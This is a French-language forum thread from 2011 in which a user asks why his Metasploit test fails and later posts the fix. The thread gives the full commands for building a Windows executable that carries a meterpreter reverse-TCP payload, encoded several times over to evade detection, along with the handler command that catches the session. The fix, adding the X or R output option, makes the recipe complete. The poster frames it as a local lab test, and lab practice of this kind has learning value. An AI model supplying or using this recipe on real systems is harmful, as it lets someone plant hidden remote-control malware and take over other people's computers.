probleme avec msfencode

Moderator: Mod

probleme avec msfencode

Postby VOXPOPULI » Tue Dec 20, 2011 3:37 pm

Peut-être que des utilisateurs plus avancés que moi dans Metasploit pourront m'aider :)

Je tente de faire un test: création d'un fichier infecté (dans un premier temps un .exe) sur Ubuntu, lancement du dit .exe sur un windows XP SP2 et récupération de la session sur ubuntu. Mon problème est que rien ne se passe dans la machine virtuelle, et meterpreter ne reçois aucune demande de session. Le tout se passe en local et les machines arrivent bien a se pinger.

Voici les commandes:
création du fichier et encodage
[code:1:0d84af9f50]msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=46666 C EXITFUNC=seh | msfencode -t exe -c 15 -e x86/shikata_ga_nai | msfencode -t exe -e x86/call4_dword_xor -c 10 | msfencode -e x86/countdown -c 10 -t exe > test.exe[/code:1:0d84af9f50]

Le shell censé récupérer la session:
[code:1:0d84af9f50]sudo msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=46666 E[/code:1:0d84af9f50]

A noter que c'est ptete l'utilisation de Ubuntu le problème :(
VOXPOPULI
Projets
 
Posts: 39
Joined: Sun Jan 23, 2011 11:54 pm

Postby VOXPOPULI » Mon Jan 02, 2012 6:41 pm

Résolu. Pour ceux qui ont le même soucis et ne savent pas d'où ça vient:
il faut ajouter a la fin de la commande msfpayload l'option X pour "exe" ou "R" pour Raw (=> uniquement pour traiter avec msfencode).
VOXPOPULI
Projets
 
Posts: 39
Joined: Sun Jan 23, 2011 11:54 pm


Return to Virologie informatique

Who is online

Users browsing this forum: No registered users and 1 guest

cron